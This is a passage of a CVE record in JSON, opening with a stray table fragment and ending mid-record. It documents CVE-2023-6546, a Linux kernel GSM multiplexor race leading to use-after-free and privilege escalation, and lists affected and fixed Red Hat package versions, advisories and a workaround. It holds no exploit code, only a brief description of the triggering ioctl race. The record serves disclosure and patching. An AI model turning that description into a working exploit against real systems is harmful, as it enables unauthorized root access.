|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Red Hat | Red Hat Enterprise Linux 8 |
Unaffected: 0:4.18.0-513.24.1.rt7.326.el8_9 < * cpe:/a:redhat:enterprise_linux:8::nfv cpe:/a:redhat:enterprise_linux:8::realtime |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T08:35:14.746Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/04/10/18"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/04/10/21"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/04/11/7"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/04/11/9"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/04/12/1"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/04/12/2"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/04/16/2"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/04/17/1"
},
{
"name": "RHSA-2024:0930",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0930"
},
{
"name": "RHSA-2024:0937",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0937"
},
{
"name": "RHSA-2024:1018",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1018"
},
{
"name": "RHSA-2024:1019",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1019"
},
{
"name": "RHSA-2024:1055",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1055"
},
{
"name": "RHSA-2024:1250",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1250"
},
{
"name": "RHSA-2024:1253",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1253"
},
{
"name": "RHSA-2024:1306",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1306"
},
{
"name": "RHSA-2024:1607",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1607"
},
{
"name": "RHSA-2024:1612",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1612"
},
{
"name": "RHSA-2024:1614",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1614"
},
{
"name": "RHSA-2024:2093",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:2093"
},
{
"name": "RHSA-2024:2394",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:2394"
},
{
"name": "RHSA-2024:2621",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:2621"
},
{
"name": "RHSA-2024:2697",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:2697"
},
{
"name": "RHSA-2024:4577",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4577"
},
{
"name": "RHSA-2024:4729",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4729"
},
{
"name": "RHSA-2024:4731",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4731"
},
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/security/cve/CVE-2023-6546"
},
{
"name": "RHBZ#2255498",
"tags": [
"issue-tracking",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2255498"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/torvalds/linux/commit/3c4f8333b582487a2d1e02171f1465531cde53e3"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.zerodayinitiative.com/advisories/ZDI-CAN-20527"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:8::nfv",
"cpe:/a:redhat:enterprise_linux:8::realtime"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-513.24.1.rt7.326.el8_9",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:8::baseos",
"cpe:/a:redhat:enterprise_linux:8::crb"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-513.24.1.el8_9",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:8::baseos"
],
"defaultStatus": "unaffected",
"packageName": "kpatch-patch",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_aus:8.2::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.2 Advanced Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-193.136.1.el8_2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_tus:8.4::baseos",
"cpe:/o:redhat:rhel_e4s:8.4::baseos",
"cpe:/o:redhat:rhel_aus:8.4::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-305.134.1.el8_4",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_tus:8.4::nfv",
"cpe:/a:redhat:rhel_tus:8.4::realtime"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 8.4 Telecommunications Update Service",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-305.134.1.rt7.210.el8_4",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_tus:8.4::baseos",
"cpe:/o:redhat:rhel_e4s:8.4::baseos",
"cpe:/o:redhat:rhel_aus:8.4::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.4 Telecommunications Update Service",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-305.134.1.el8_4",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_tus:8.4::baseos",
"cpe:/o:redhat:rhel_e4s:8.4::baseos",
"cpe:/o:redhat:rhel_aus:8.4::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-305.134.1.el8_4",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_e4s:8.4::baseos"
],
"defaultStatus": "unaffected",
"packageName": "kpatch-patch",
"product": "Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhev_hypervisor:4.4::el8",
"cpe:/o:redhat:rhel_eus:8.6::baseos",
"cpe:/a:redhat:rhel_eus:8.6::crb"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.6 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-372.93.1.el8_6",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_eus:8.6::baseos"
],
"defaultStatus": "unaffected",
"packageName": "kpatch-patch",
"product": "Red Hat Enterprise Linux 8.6 Extended Update Support",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_eus:8.8::baseos",
"cpe:/a:redhat:rhel_eus:8.8::crb"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.8 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-477.55.1.el8_8",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_eus:8.8::baseos"
],
"defaultStatus": "unaffected",
"packageName": "kpatch-patch",
"product": "Red Hat Enterprise Linux 8.8 Extended Update Support",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:9::nfv",
"cpe:/a:redhat:enterprise_linux:9::appstream",
"cpe:/o:redhat:enterprise_linux:9::baseos",
"cpe:/a:redhat:enterprise_linux:9::crb",
"cpe:/a:redhat:enterprise_linux:9::realtime"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-427.13.1.el9_4",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:9::nfv",
"cpe:/a:redhat:enterprise_linux:9::appstream",
"cpe:/o:redhat:enterprise_linux:9::baseos",
"cpe:/a:redhat:enterprise_linux:9::crb",
"cpe:/a:redhat:enterprise_linux:9::realtime"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-427.13.1.el9_4",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus:9.0::crb",
"cpe:/a:redhat:rhel_eus:9.0::appstream",
"cpe:/o:redhat:rhel_eus:9.0::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9.0 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-70.93.2.el9_0",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus:9.0::realtime",
"cpe:/a:redhat:rhel_eus:9.0::nfv"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 9.0 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-70.93.1.rt21.165.el9_0",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_eus:9.0::baseos"
],
"defaultStatus": "unaffected",
"packageName": "kpatch-patch",
"product": "Red Hat Enterprise Linux 9.0 Extended Update Support",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus:9.2::appstream",
"cpe:/a:redhat:rhel_eus:9.2::crb",
"cpe:/o:redhat:rhel_eus:9.2::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9.2 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-284.55.1.el9_2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus:9.2::nfv",
"cpe:/a:redhat:rhel_eus:9.2::realtime"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 9.2 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-284.55.1.rt14.340.el9_2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_eus:9.2::baseos"
],
"defaultStatus": "unaffected",
"packageName": "kpatch-patch",
"product": "Red Hat Enterprise Linux 9.2 Extended Update Support",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhev_hypervisor:4.4::el8",
"cpe:/o:redhat:rhel_eus:8.6::baseos",
"cpe:/a:redhat:rhel_eus:8.6::crb"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Virtualization 4 for Red Hat Enterprise Linux 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-372.93.1.el8_6",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.7::el8"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/cluster-logging-operator-bundle",
"product": "RHOL-5.7-RHEL-8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.7.13-16",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.7::el8"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/cluster-logging-rhel8-operator",
"product": "RHOL-5.7-RHEL-8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.7.13-7",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.7::el8"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/elasticsearch6-rhel8",
"product": "RHOL-5.7-RHEL-8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v6.8.1-408",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.7::el8"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/elasticsearch-operator-bundle",
"product": "RHOL-5.7-RHEL-8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.7.13-19",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.7::el8"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/elasticsearch-proxy-rhel8",
"product": "RHOL-5.7-RHEL-8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v1.0.0-480",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.7::el8"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/elasticsearch-rhel8-operator",
"product": "RHOL-5.7-RHEL-8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.7.13-9",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.7::el8"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/eventrouter-rhel8",
"product": "RHOL-5.7-RHEL-8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v0.4.0-248",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.7::el8"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/fluentd-rhel8",
"product": "RHOL-5.7-RHEL-8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v1.14.6-215",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.7::el8"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/kibana6-rhel8",
"product": "RHOL-5.7-RHEL-8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v6.8.1-431",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.7::el8"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/log-file-metric-exporter-rhel8",
"product": "RHOL-5.7-RHEL-8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v1.1.0-228",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.7::el8"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/logging-curator5-rhel8",
"product": "RHOL-5.7-RHEL-8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.1-471",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.7::el8"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/logging-loki-rhel8",
"product": "RHOL-5.7-RHEL-8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v2.9.6-15",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.7::el8"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/logging-view-plugin-rhel8",
"product": "RHOL-5.7-RHEL-8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.7.13-3",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.7::el8"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/loki-operator-bundle",
"product": "RHOL-5.7-RHEL-8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.7.13-27",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.7::el8"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/loki-rhel8-operator",
"product": "RHOL-5.7-RHEL-8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.7.13-12",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.7::el8"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/lokistack-gateway-rhel8",
"product": "RHOL-5.7-RHEL-8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v0.1.0-527",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.7::el8"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/opa-openshift-rhel8",
"product": "RHOL-5.7-RHEL-8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v0.1.0-225",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.7::el8"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/vector-rhel8",
"product": "RHOL-5.7-RHEL-8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v0.28.1-57",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:6"
],
"defaultStatus": "unaffected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 6",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "unaffected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "unaffected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:9"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat"
}
],
"datePublic": "2023-12-21T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "A race condition was found in the GSM 0710 tty multiplexor in the Linux kernel. This issue occurs when two threads execute the GSMIOC_SETCONF ioctl on the same tty file descriptor with the gsm line discipline enabled, and can lead to a use-after-free problem on a struct gsm_dlci while restarting the gsm mux. This could allow a local unprivileged user to escalate their privileges on the system."
}
],
"metrics": [
{
"other": {
"content": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"value": "Important"
},
"type": "Red Hat severity rating"
}
},
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-416",
"description": "Use After Free",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-09-25T13:21:01.062Z",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"name": "RHSA-2024:0930",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0930"
},
{
"name": "RHSA-2024:0937",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0937"
},
{
"name": "RHSA-2024:1018",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1018"
},
{
"name": "RHSA-2024:1019",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1019"
},
{
"name": "RHSA-2024:1055",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1055"
},
{
"name": "RHSA-2024:1250",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1250"
},
{
"name": "RHSA-2024:1253",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1253"
},
{
"name": "RHSA-2024:1306",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1306"
},
{
"name": "RHSA-2024:1607",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1607"
},
{
"name": "RHSA-2024:1612",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1612"
},
{
"name": "RHSA-2024:1614",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1614"
},
{
"name": "RHSA-2024:2093",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:2093"
},
{
"name": "RHSA-2024:2394",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:2394"
},
{
"name": "RHSA-2024:2621",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:2621"
},
{
"name": "RHSA-2024:2697",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:2697"
},
{
"name": "RHSA-2024:4577",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4577"
},
{
"name": "RHSA-2024:4729",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4729"
},
{
"name": "RHSA-2024:4731",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4731"
},
{
"name": "RHSA-2024:4970",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4970"
},
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/security/cve/CVE-2023-6546"
},
{
"name": "RHBZ#2255498",
"tags": [
"issue-tracking",
"x_refsource_REDHAT"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2255498"
},
{
"url": "https://github.com/torvalds/linux/commit/3c4f8333b582487a2d1e02171f1465531cde53e3"
},
{
"url": "https://www.zerodayinitiative.com/advisories/ZDI-CAN-20527"
}
],
"timeline": [
{
"lang": "en",
"time": "2023-12-18T00:00:00+00:00",
"value": "Reported to Red Hat."
},
{
"lang": "en",
"time": "2023-12-21T00:00:00+00:00",
"value": "Made public."
}
],
"title": "Kernel: gsm multiplexing race condition leads to privilege escalation",
"workarounds": [
{
"lang": "en",
"value": "This flaw can be mitigated by preventing the affected `n_gsm` kernel module from being loaded. For instructions on how to blacklist a kernel module, please see https://access.redhat.com/solutions/41278."
}
],
"x_redhatCweChain": "CWE-362-\u003eCWE-416: Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027) leads to Use After Free"
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
